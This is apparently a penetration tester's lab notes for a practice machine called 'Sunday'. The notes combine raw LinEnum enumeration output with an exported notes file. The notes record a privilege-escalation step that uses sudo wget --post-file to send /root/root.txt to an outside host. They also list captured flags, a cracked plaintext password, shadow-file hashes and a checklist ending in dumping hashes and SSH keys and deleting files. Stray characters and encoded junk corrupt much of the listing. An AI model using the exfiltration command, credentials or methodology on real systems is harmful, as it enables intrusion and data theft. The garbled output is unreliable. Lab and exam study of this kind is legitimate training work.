6260 1992 pts/2 S 15:12:40 0:00 /bin/bash ./LinEnu root 140 0.0 0.2 8756 3384 ? S 13:26:33 0:07 /usr/sbin/nscd root 514 0.0 0.1 5892 1984 ? S 13:26:48 0:00 /usr/bin/bash /roo root 26241 0.0 0.1 4068 944 ? S 15:14:26 0:00 /usr/gnu/bin/sleep root 9 0.0 0.61317211368 ? S 13:26:24 0:12 /lib/svc/bin/svc.c root 69 0.0 0*.312768 5288 ? S 13:26:31 0:00 devfsadmd root 0 0.0 0.0 0 0 ? T 13:26:22 0:01 sched root 1 0.0 0.1 2732 1032 ? S 13:26:23 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 13:26:23 0:00 pageout root 7 0.0 0.513936 8928 ? S 13:26:24 0:03 /lib/svc/bin/svc.s dladm 16 0.0 0.1 3060 1544 ? S 13:26:27 0:00 /sbin/dlmgmtd daemon 51 0.0 0.3 9404 4620 ? S 13:26:30 0:02 /lib/crypto/kcfd root 152 0.0 0.1 2120 1328 ? S 13:26:33 0:00 /usr/lib/power/pow root 160 0.0 0.1 7892 2320 ? S 13:26:33 0:00 /usr/lib/sysevent/ root 170 0.0 0.2 6488 2688 ? S 13:26:34 0:00 /usr/lib/picl/picl root 252 0.0 0.1 4800 1572 ? S 13:26:37 0:00 /usr/lib/dbus-daem root 328 0.0 0.1 4384 1120 ? S 13:26:39 0:00 /usr/sbin/cron root 332 0.0 0.3 6672 4876 ? S 13:26:39 0:01 /usr/lib/hal/hald root 333 0.0 0.1 3852 1848 ? S 13:26:39+ 0:00 hald-runner root 334 0.0 0.1 3956 1900 ? S 13:26:39 0:00 /usr/lib/hal/hald- root 336 0.0 0.1 3968 1912 ? S 13:26:40 0:00 /usr/lib/hal/hald- root 337 0.0 0.1 3876 2008 ? S 13:26:40 0:00 /usr/lib/hal/hald- daemon 348 0.0 0.1 3344 1204 ? S 13:26:41 0:00 /usr/sbin/rpcbind root 351 0.0 0.1 5136 1308 ? S 13:26:41 0:00 /usr/lib/autofs/au root 352 0.0 0.1 5208 1336 ? S 13:26:41 0:00 /usr/lib/autofs/au root 373 0.0 0.61947211776 ? S 13:26:41 0:01 /usr/lib/fm/fmd/fm root 374 0.0 0.1 2344 1060 ? S 13:26:41 0:00 /usr/lib/saf/sac - root 375 0.0 0.1 2504 1152 ? S 13:26:41 0:00 /usr/lib/saf/ttymo root 379 0.0 0.1 1636 756 ? S 13:26:42 0:00 /usr/lib/utmpd root 381 0.0 0.2 8748 3392 ? S 13:26:42 0:29 /usr/lib/inet/inet root 389 0.0 0.1 2756 1468 ? S 13:26:42 0:00 /usr/lib/hal/hald- root 397 0.0 0.1 2572 876 ? S ,13:26:42 0:00 /usr/lib/inet/in.n root 402 0.0 0.1 6656 1904 ? S 13:26:42 0:00 /usr/sbin/syslogd root 410 0.0 0.1 2008 1220 console S 13:26:42 0:00 /usr/lib/saf/ttymo root 421 0.0 0.1 6740 1596 ? S 13:26:43 0:00 /usr/lib/ssh/sshd noaccess 442 0.0 0.1 2688 1288 ? S 13:26:45 0:00 /usr/lib/inet/mdns daemon 460 0.0 0.1 3068 1704 ? S 13:26:45 0:00 /usr/sbin/avahi-da root 471 0.0 0.1 4192 1876 ? S 13:26:46 0:00 /usr/lib/rmvolmgr root 480 0.0 0.3 9128 5220 ? S 13:26:46 0:00 /usr/perl5/bin/per root 481 0.0 0.1 8092 1920 ? S 13:26:46 0:00 /usr/sbin/gdm-bina root 482 0.0 0.2 9444 2912 ? S 13:26:46 0:00 /usr/sbin/gdm-bina root 525 0.0 0.1 3520 1248 ? S 13:26:50 0:00 /usr/openwin/bin/f root 601 0.0 0.1 6136 1952 ? S 13:29:45 0:00 /usr/lib/sendmail smmsp 603 0.0 0.1 6268 1548 ? S 13:29:45 0:00 /usr/lib/sendmail noaccess 3711 0.0 0.1 230-0 976 ? S 13:41:08 0:00 /usr/sbin/in.finge noaccess 4031 0.0 0.1 2300 976 ? S 13:41:32 0:00 /usr/sbin/in.finge noaccess 4034 0.0 0.1 2300 976 ? S 13:41:32 0:00 /usr/sbin/in.finge noaccess 4156 0.0 0.1 2300 976 ? S 13:41:40 0:00 /usr/sbin/in.finge noaccess 4268 0.0 0.1 2300 976 ? S 13:41:50 0:00 /usr/sbin/in.finge noaccess 4269 0.0 0.1 2300 976 ? S 13:41:50 0:00 /usr/sbin/in.finge noaccess 4288 0.0 0.1 2300 976 ? S 13:41:51 0:00 /usr/sbin/in.finge noaccess 4576 0.0 0.1 2300 976 ? S 13:42:10 0:00 /usr/sbin/in.finge noaccess 4881 0.0 0.1 2300 976 ? S 13:42:35 0:00 /usr/sbin/in.finge noaccess 4919 0.0 0.1 2300 976 ? S 13:42:38 0:00 /usr/sbin/in.finge noaccess 4958 0.0 0.1 2300 976 ? S 13:42:43 0:00 /usr/sbin/in.finge noaccess 6177 0.0 0.1 2300 976 ? S 13:44:28 0:00 /usr/sbin/in.finge noaccess 6216 0.0 0.1 2300 976 ? S 13:44:31 0:00 /usr/sbin/in.finge noaccess. 6253 0.0 0.1 2300 976 ? S 13:44:34 0:00 /usr/sbin/in.finge noaccess 6333 0.0 0.1 2300 976 ? S 13:44:37 0:00 /usr/sbin/in.finge noaccess 6725 0.0 0.1 2300 976 ? S 13:45:06 0:00 /usr/sbin/in.finge noaccess 7182 0.0 0.1 2300 976 ? S 13:45:49 0:00 /usr/sbin/in.finge noaccess 7183 0.0 0.1 2300 976 ? S 13:45:49 0:00 /usr/sbin/in.finge noaccess 7428 0.0 0.1 2300 976 ? S 13:46:06 0:00 /usr/sbin/in.finge noaccess 7600 0.0 0.1 2300 976 ? S 13:46:24 0:00 /usr/sbin/in.finge noaccess 7826 0.0 0.1 2300 976 ? S 13:46:45 0:00 /usr/sbin/in.finge noaccess 8370 0.0 0.1 2300 976 ? S 13:47:42 0:00 /usr/sbin/in.finge noaccess 8601 0.0 0.1 2300 976 ? S 13:48:01 0:00 /usr/sbin/in.finge noaccess 9660 0.0 0.1 2300 976 ? S 13:49:38 0:00 /usr/sbin/in.finge noaccess 9663 0.0 0.1 2300 976 ? S 13:49:38 0:00 /usr/sbin/in.finge noaccess 9749 0.0 0.1 2300 976 ? S 13:49:45 0:00 /usr/sb/in/in.finge noaccess 9920 0.0 0.1 2300 976 ? S 13:50:10 0:00 /usr/sbin/in.finge noaccess 10414 0.0 0.1 2300 976 ? S 13:51:04 0:00 /usr/sbin/in.finge noaccess 12014 0.0 0.1 2300 976 ? S 13:53:11 0:00 /usr/sbin/in.finge noaccess 12280 0.0 0.1 2300 976 ? S 13:53:27 0:00 /usr/sbin/in.finge noaccess 12470 0.0 0.1 2300 976 ? S 13:53:41 0:00 /usr/sbin/in.finge noaccess 12552 0.0 0.1 2300 976 ? S 13:53:49 0:00 /usr/sbin/in.finge noaccess 12553 0.0 0.1 2300 976 ? S 13:53:49 0:00 /usr/sbin/in.finge noaccess 12770 0.0 0.1 2300 976 ? S 13:54:03 0:00 /usr/sbin/in.finge noaccess 13311 0.0 0.1 2300 976 ? S 13:54:44 0:00 /usr/sbin/in.finge noaccess 13312 0.0 0.1 2300 976 ? S 13:54:44 0:00 /usr/sbin/in.finge noaccess 13914 0.0 0.1 2300 976 ? S 13:55:26 0:00 /usr/sbin/in.finge noaccess 14212 0.0 0.1 2300 976 ? S 13:55:45 0:00 /usr/sbin/in.finge noaccess 14819 0.0 0.1 2300 976 ? S 130:56:47 0:00 /usr/sbin/in.finge noaccess 14854 0.0 0.1 2300 976 ? S 13:56:48 0:00 /usr/sbin/in.finge noaccess 14857 0.0 0.1 2300 976 ? S 13:56:52 0:00 /usr/sbin/in.finge noaccess 16242 0.0 0.1 2300 976 ? S 13:58:32 0:00 /usr/sbin/in.finge noaccess 16283 0.0 0.1 2300 976 ? S 13:58:37 0:00 /usr/sbin/in.finge noaccess 17653 0.0 0.1 2300 976 ? S 14:00:10 0:00 /usr/sbin/in.finge noaccess 18013 0.0 0.1 2300 976 ? S 14:00:42 0:00 /usr/sbin/in.finge noaccess 19289 0.0 0.1 2300 976 ? S 14:02:40 0:00 /usr/sbin/in.finge noaccess 19290 0.0 0.1 2300 976 ? S 14:02:40 0:00 /usr/sbin/in.finge noaccess 19486 0.0 0.1 2300 976 ? S 14:02:56 0:00 /usr/sbin/in.finge noaccess 19490 0.0 0.1 2300 976 ? S 14:02:56 0:00 /usr/sbin/in.finge noaccess 19580 0.0 0.1 2300 976 ? S 14:03:02 0:00 /usr/sbin/in.finge noaccess 19617 0.0 0.1 2300 976 ? S 14:03:05 0:00 /usr/sbin/in.finge noaccess 19881 0.0 0.1 23010 976 ? S 14:03:28 0:00 /usr/sbin/in.finge noaccess 19882 0.0 0.1 2300 976 ? S 14:03:28 0:00 /usr/sbin/in.finge noaccess 20290 0.0 0.1 2300 976 ? S 14:03:59 0:00 /usr/sbin/in.finge noaccess 20435 0.0 0.1 2300 976 ? S 14:04:10 0:00 /usr/sbin/in.finge noaccess 20741 0.0 0.1 2300 976 ? S 14:04:36 0:00 /usr/sbin/in.finge noaccess 21125 0.0 0.1 2300 976 ? S 14:05:06 0:00 /usr/sbin/in.finge noaccess 21369 0.0 0.1 2300 976 ? S 14:05:27 0:00 /usr/sbin/in.finge noaccess 21491 0.0 0.1 2300 976 ? S 14:05:37 0:00 /usr/sbin/in.finge noaccess 21910 0.0 0.1 2300 976 ? S 14:06:10 0:00 /usr/sbin/in.finge noaccess 21975 0.0 0.1 2300 976 ? S 14:06:15 0:00 /usr/sbin/in.finge noaccess 22044 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess 22049 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess 22050 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess2 22269 0.0 0.1 2300 976 ? S 14:06:39 0:00 /usr/sbin/in.finge root 24674 0.0 0.2 9316 3180 ? S 14:41:33 0:00 /usr/lib/ssh/sshd root 24874 0.0 0.2 9604 3808 ? S 14:43:17 0:00 /usr/lib/ssh/sshd root 24964 0.0 0.2 9316 3456 ? S 14:43:59 0:00 /usr/lib/ssh/sshd root 25044 0.0 0.2 9316 3332 ? S 14:44:46 0:00 /usr/lib/ssh/sshd root 25070 0.0 0.2 9320 3484 ? S 14:44:59 0:00 /usr/lib/ssh/sshd root 25150 0.0 0.2 9320 3488 ? S 14:45:38 0:00 /usr/lib/ssh/sshd root 25729 0.0 0.2 8116 2856 ? S 15:07:48 0:00 /usr/lib/ssh/sshd sunny 25730 0.0 0.210148 4416 ? S 15:07:48 0:00 /usr/lib/ssh/sshd sunny 25737 0.0 0.1 5868 2216 pts/2 S 15:07:57 0:00 -bash sunny 25880 0.0 0.2 6200 2372 pts/2 S 15:12:40 0:00 /bin/bash ./LinEnu sunny 25883 0.0 0.1 4068 964 pts/2 S 15:12:40 0:00 tee -a sunny 26262 0.0 0.1 6260 980 pts/2 S 15:14:30 0:00 /bin/bash ./LinEnu [00;31m[-] Process 3binaries and associated permissions (from above list):[00m 771K -r-xr-xr-x 1 root bin 719K 2009-05-14 21:21 /bin/bash 24K -r-xr-xr-x 1 root bin 24K 2009-05-14 21:18 /lib/crypto/kcfd 44K -r-xr-xr-x 1 root bin 44K 2009-05-14 21:18 /sbin/dlmgmtd 62K -r-xr-xr-x 1 root sys 61K 2009-05-14 21:18 /sbin/init 771K -r-xr-xr-x 1 root bin 719K 2009-05-14 21:21 /usr/bin/bash 24K -r-xr-xr-x 1 root bin 23K 2009-05-14 21:22 /usr/gnu/bin/sleep 259K -r-xr-xr-x 1 root bin 254K 2009-05-14 21:21 /usr/lib/hal/hald 53K -r-xr-xr-x 1 root bin 53K 2009-05-14 21:22 /usr/lib/rmvolmgr 33K -r-xr-xr-x 1 root sys 33K 2009-05-14 21:18 /usr/lib/saf/sac 1.1M -r-xr-sr-x 1 root smmsp 1017K 2009-05-14 21:22 /usr/lib/sendmail 515K -r-xr-xr-x 1 root bin 388K 2009-05-14 21:22 /usr/lib/ssh/sshd 19K -r-xr-xr-x 1 root bin 19K 2009-05-14 21:18 /usr/lib/utmpd 69K -r-xr-xr-x 1 root sys 69K 2009-05-14 21:18 /usr/sbin/cron 259K -r-xr-xr-x 1 root bin 214K 2009-05-14 21:18 /usr/sbin/nscd 62K -r-xr-xr-4x 1 root bin 62K 2009-05-14 21:18 /usr/sbin/rpcbind 87K -r-xr-xr-x 1 root sys 87K 2009-05-14 21:18 /usr/sbin/syslogd /usr/lib/sysevent/: total 99K 1.5K drwxr-xr-x 3 root bin 5 2018-04-15 19:47 . 37K drwxr-xr-x 134 root bin 1.4K 2018-04-15 19:51 .. 1.5K drwxr-xr-x 2 root bin 8 2018-04-15 19:47 modules 24K -r-xr-xr-x 1 root bin 23K 2009-05-14 21:18 syseventconfd 36K -r-xr-xr-x 1 root bin 35K 2009-05-14 21:18 syseventd [00;31m[-] Contents of /etc/inetd.conf:[00m # # CDDL HEADER START # # The contents of this file are subject to the terms of the # Common Development and Distribution License, Version 1.0 only # (the "License"). You may not use this file except in compliance # with the License. # # You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE # or http://www.opensolaris.org/os/licensing. # See the License for the specific language governing permissio5ns # and limitations under the License. # # When distributing Covered Code, include this CDDL HEADER in each # file and include the License file at usr/src/OPENSOLARIS.LICENSE. # If applicable, add the following below this CDDL HEADER, with the # fields enclosed by brackets "[]" replaced with your own identifying # information: Portions Copyright [yyyy] [name of copyright owner] # # CDDL HEADER END # # # Copyright 2004 Sun Microsystems, Inc. All rights reserved. # Use is subject to license terms. # #ident "%Z%%M% %I% %E% SMI" # # Legacy configuration file for inetd(1M). See inetd.conf(4). # # This file is no longer directly used to configure inetd. # The Solaris services which were formerly configured using this file # are now configured in the Service Management Facility (see smf(5)) # using inetadm(1M). # # Any records remaining in this file after installation or upgrade, # or later created by installing additional software, must be converted # to smf(5) services and imported into 6the smf repository using # inetconv(1M), otherwise the service will not be available. Once # a service has been converted using inetconv, further changes made to # its entry here are not reflected in the service. # [00;31m[-] /etc/init.d/ binary permissions:[00m total 52 drwxr-xr-x 2 root sys 21 2018-04-24 11:02 . drwxr-xr-x 77 root sys 224 2020-07-17 15:12 .. -rwxr--r-- 1 root sys 1276 2009-05-14 21:22 acct -rwxr-xr-x 2 root other 1558 2009-05-14 21:21 autoinstall -rwxr--r-- 2 root sys 2065 2009-05-14 21:18 cachefs.daemon -rwxr--r-- 2 root sys 1540 2009-05-14 21:18 deallocate -rwxr--r-- 1 root sys 1355 2009-05-14 21:18 devlinks -rwxr--r-- 2 root sys 1010 2009-05-14 21:22 dodatadm.udaplt -rwxr--r-- 1 root sys 1118 2009-05-14 21:18 drvconfig -rwxr--r-- 1 root sys 1384 2009-05-14 21:18 ldap.client -rwxr--r-- 1 root sys 1301 2009-05-14 21:18 mkdtab -rwxr--r-- 1 root sys 1300 2009-05-14 21:22 nfs.server -rwxr--r-- 1 root sys 1382 2009-05-14 21:18 nscd -rwx------ 1 ro7ot root 169 2018-04-24 11:23 overwrite -rwxr--r-- 1 root sys 1209 2009-05-14 21:21 pcmcia -rwxr--r-- 5 root sys 2546 2009-05-14 21:21 pppd -rwxr--r-- 2 root sys 1065 2009-05-14 21:18 PRESERVE -rw-r--r-- 1 root sys 3293 2009-05-14 21:18 README -rwxr--r-- 1 root sys 1564 2009-05-14 21:22 sendmail -rwxr--r-- 2 root sys 1614 2009-05-14 21:18 sysetup -rwxr--r-- 1 root sys 1112 2009-05-14 21:18 ufs_quota [00;33m### SOFTWARE #############################################[00m [00;31m[-] Sudo version:[00m Sudo version 1.6.9p17 [00;33m### INTERESTING FILES ####################################[00m [00;31m[-] Useful file locations:[00m /usr/bin/wget [00;31m[-] Can we read/write sensitive files:[00m -rw-r--r-- 1 root sys 976 2018-04-15 20:18 /etc/passwd -rw-r--r-- 1 root sys 347 2009-05-14 21:18 /etc/group -rw-r--r-- 1 root sys 1592 2009-05-14 21:18 /etc/profile -r-------- 1 root sys 634 2018-04-15 20:18 /etc/shadow [00;31m[-] SUID files:[00m --wsr--r-x 1 root root 0 2018-04-16 01:12 /med8ia/.hal-mtab-lock -rwsr-xr-x 1 root bin 64436 2009-05-14 21:22 /sbin/wificonfig -r-sr-xr-x 1 root bin 313848 2009-05-14 21:22 /usr/X11/bin/xscreensaver -r-sr-xr-x 1 root bin 2251272 2009-05-14 21:21 /usr/X11/bin/amd64/Xorg -r-sr-xr-x 1 root bin 2001996 2009-05-14 21:21 /usr/X11/bin/i386/Xorg -rwsr-xr-x 1 root bin 97452 2009-05-14 21:21 /usr/X11/bin/xlock -r-sr-xr-x 1 root bin 55680 2009-05-14 21:22 /usr/sbin/ping -r-sr-xr-x 1 root bin 24656 2009-05-14 21:18 /usr/sbin/amd64/whodo -rwsr-xr-x 1 root sys 33032 2009-05-14 21:18 /usr/sbin/sacadm -r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/list_devices -r-sr-xr-x 1 root bin 42504 2009-05-14 21:18 /usr/sbin/traceroute -r-sr-xr-x 1 root bin 37536 2009-05-14 21:21 /usr/sbin/pmconfig -r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/deallocate -r-sr-xr-x 1 root bin 18220 2009-05-14 21:18 /usr/sbin/i86/whodo -r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/allocate -r-sr-xr-x 1 root bin 29396 2009-05-14 21:21 /usr/xpg4/bin/crontab -rwsr-xr-x 1 r9oot sys 48044 2009-05-14 21:21 /usr/xpg4/bin/at -rwsr-xr-x 1 svctag daemon 106804 2009-05-14 21:22 /usr/bin/stclient -r-sr-xr-x 1 root bin 27240 2009-05-14 21:21 /usr/bin/sys-suspend -r-sr-xr-x 1 root bin 33736 2009-05-14 21:21 /usr/bin/rsh -r-sr-xr-x 1 root bin 29376 2009-05-14 21:18 /usr/bin/crontab -r-sr-xr-x 1 root bin 78696 2009-05-14 21:21 /usr/bin/rdist -r-s--x--x 2 root bin 173912 2009-05-14 21:22 /usr/bin/sudo -r-s--x--x 1 root lp 17288 2009-05-14 21:21 /usr/bin/lpset -r-sr-xr-x 2 root bin 24568 2009-05-14 21:18 /usr/bin/amd64/w -r-sr-xr-x 2 root bin 24568 2009-05-14 21:18 /usr/bin/amd64/uptime -r-sr-xr-x 1 root sys 29616 2009-05-14 21:18 /usr/bin/amd64/newtask -r-sr-xr-x 1 root sys 55332 2009-05-14 21:22 /usr/bin/chkey -r-sr-xr-x 1 root bin 42624 2009-05-14 21:18 /usr/bin/login -r-sr-xr-x 1 root bin 18352 2009-05-14 21:18 /usr/bin/pfexec -rwsr-xr-x 1 root sys 13820 2009-05-14 21:18 /usr/bin/newgrp -r-sr-xr-x 1 root bin 8392 2009-05-14 21:22 /usr/bin/mailq -r-sr-xr-x 1 root bin 39464 2009-05-14 2:1:21 /usr/bin/rlogin -r-sr-xr-x 1 root bin 257008 2009-05-14 21:21 /usr/bin/pppd -r-s--x--x 1 uucp bin 70188 2009-05-14 21:18 /usr/bin/tip -rwsr-xr-x 1 root sys 18860 2009-05-14 21:18 /usr/bin/atq -r-sr-xr-x 1 root bin 53316 2009-05-14 21:21 /usr/bin/rcp -r-sr-xr-x 1 root bin 68792 2009-05-14 21:22 /usr/bin/rmformat -rwsr-xr-x 1 root sys 23320 2009-05-14 21:18 /usr/bin/atrm -rwsr-xr-x 1 root sys 47924 2009-05-14 21:18 /usr/bin/at -r-s--x--x 2 root bin 173912 2009-05-14 21:22 /usr/bin/sudoedit -r-sr-xr-x 1 root bin 39624 2009-05-14 21:18 /usr/bin/fdformat -r-sr-xr-x 2 root bin 22220 2009-05-14 21:18 /usr/bin/i86/w -r-sr-xr-x 1 root sys 22872 2009-05-14 21:18 /usr/bin/i86/newtask -r-sr-xr-x 2 root bin 22220 2009-05-14 21:18 /usr/bin/i86/uptime -r-sr-sr-x 1 root sys 31584 2009-05-14 21:18 /usr/bin/passwd -r-sr-xr-x 1 root sys 34896 2009-05-14 21:18 /usr/bin/su -r-sr-xr-x 1 root bin 13120 2009-05-14 21:18 /usr/lib/utmp_update -r-s--x--x 1 root bin 44016 2009-05-14 21:22 /usr/lib/print/lpd-port -r-s--x--x 1 ro;ot bin 27744 2009-05-14 21:21 /usr/lib/lp/bin/netpr -r-sr-xr-x 1 root bin 205204 2009-05-14 21:22 /usr/lib/ssh/ssh-keysign -rwsr-xr-x 1 root adm 12528 2009-05-14 21:22 /usr/lib/acct/accton -r-sr-xr-x 1 root bin 111432 2009-05-14 21:18 /usr/lib/fs/ufs/ufsrestore -r-sr-xr-x 1 root bin 106720 2009-05-14 21:18 /usr/lib/fs/ufs/ufsdump -r-sr-xr-x 1 root bin 23120 2009-05-14 21:18 /usr/lib/fs/ufs/quota [00;31m[-] SGID files:[00m -rwxr-sr-x 1 root root 240232 2009-05-14 21:21 /usr/X11/bin/lbxproxy -r-xr-sr-x 1 root root 3331140 2009-05-14 21:22 /usr/X11/bin/Xvnc -r-xr-sr-x 1 root sys 58560 2009-05-14 21:18 /usr/sbin/amd64/prtconf -r-xr-sr-x 1 root sys 34904 2009-05-14 21:18 /usr/sbin/amd64/sysdef -r-xr-sr-x 1 root sys 23576 2009-05-14 21:18 /usr/sbin/amd64/swap -r-xr-sr-x 1 root tty 18380 2009-05-14 21:18 /usr/sbin/wall -r-xr-sr-x 1 root sys 27888 2009-05-14 21:18 /usr/sbin/eeprom -r-xr-sr-x 1 root sys 27856 2009-05-14 21:18 /usr/sbin/i86/sysdef -r-xr-sr-x 1 root sys 21536 2009-05-14 21:18 /usr/sbin/i86/swap -r<-xr-sr-x 1 root sys 46612 2009-05-14 21:18 /usr/sbin/i86/prtconf -rwxr-sr-x 1 root sys 13576 2009-05-14 21:18 /usr/sbin/prtdiag -rwxr-sr-x 1 root slocate 52692 2009-05-14 21:22 /usr/bin/slocate -r-x--s--x 1 root mail 75708 2009-05-14 21:18 /usr/bin/mail -r-x--s--x 1 root mail 139176 2009-05-14 21:18 /usr/bin/mailx -r-xr-sr-x 1 root tty 17948 2009-05-14 21:18 /usr/bin/write -r-sr-sr-x 1 root sys 31584 2009-05-14 21:18 /usr/bin/passwd -r-xr-sr-x 1 root smmsp 1041292 2009-05-14 21:22 /usr/lib/sendmail [00;31m[-] World-writable files (excluding /proc and /sys):[00m -rw-rw-rw- 1 root root 0 2020-07-17 13:26 /system/contract/process/template --w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/1/ctl --w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/4/ctl --w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/5/ctl --w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/7/ctl -rw-rw-rw- 1 root root 0 2020-07-17 13:26 /system/contract/device/template -rw-rw-=rw- 1 root bin 0 2009-05-14 21:18 /var/adm/spellhist [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m -rw-r--r-- 1 root sys 954 2009-05-14 21:22 /etc/sdp.conf -rw-r--r-- 1 root root 362 2009-05-14 21:22 /etc/updatedb.conf -rw-r--r-- 1 root bin 1192 2009-05-14 21:21 /etc/hba.conf -rw-r--r-- 1 root sys 3788 2009-05-14 21:18 /etc/nscd.conf -rw-r--r-- 1 root sys 2210 2009-05-14 21:18 /etc/logadm.conf -rw-r--r-- 1 root sys 4222 2009-05-14 21:18 /etc/pam.conf -rw-r--r-- 1 root sys 1881 2009-05-14 21:22 /etc/nfssec.conf -rw-r--r-- 1 root bin 1193 2009-05-14 21:21 /etc/ima.conf -rw-r--r-- 1 root root 22 2018-04-24 12:51 /etc/resolv.conf -rw-r--r-- 1 root sys 1807 2009-05-14 21:18 /etc/syslog.conf -rw-r--r-- 1 root sys 411 2018-04-16 15:27 /etc/power.conf -rw-r--r-- 1 root root 2189 2018-04-23 15:12 /etc/nsswitch.conf -rw-r--r-- 1 root root 1355 2009-05-14 21:21 /etc/gksu.conf -rw-r--r-- 1 root sys 3011 2009-05-14 21:18 /etc/dacf.conf -rw-r--r-- 1 root sys 1111 2009-05-14 21:21 /etc/printers.conf -rw-r--r-- 1 root bin 1139 2009-05-14 21:21 /etc/mpapi.conf -rw-r--r-- 1 root sys 368 2009-05-14 21:21 /etc/esd.conf -rw-r--r-- 1 root other 250 2020-07-17 13:26 /etc/dumpadm.conf [00;31m[-] Current user's history files:[00m -rw------- 1 root root 0 2018-04-24 09:10 /export/home/sunny/.bash_history [00;31m[-] Any interesting mail in /var/mail:[00m total 8 drwxrwxrwt 3 root mail 4 2018-04-24 11:05 . drwxr-xr-x 35 root sys 35 2018-04-15 20:26 .. -rw-rw---- 1 root mail 2234 2018-04-24 11:05 root drwxrwxr-x 2 root mail 2 2009-05-14 21:18 :saved [00;33m### SCAN COMPLETE ####################################[00mcustom-colorsXAIZ|xApT- &#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4*L)+'  Script Results [00;31m######################### ^p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILgρ/]'  Running ProcessesProcess Listcustom-colors$AIwq QQ)c'  Scheduled JobsScheduled Taskscustom-colors$ANl G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[* OO.+'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability sammy@sunday:~$ sudo -l User sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget Exploit Code Used sudo wget --post-file=/root/root.txt http://10.10.14.10/ Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAur ::A/!'  Proof\Flags\OtherSammy - a3d9498027ca5187ba1793943ee8a598 Root - fb40fab61d99d37536daeec0d97af9b8custom-colors$Au mW]'  PasswordsSunny - sunday Sammy - hash = $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB sammy plain = cooldude!custom-colors$AntċD<-'   Hashes/backup/shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636:::::: custom-colors$Ap-g'  Goodiescustom-colorsVA?& c KKh  ' Log Bookcustom-colors(AI^ɚ(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xEich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaFddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,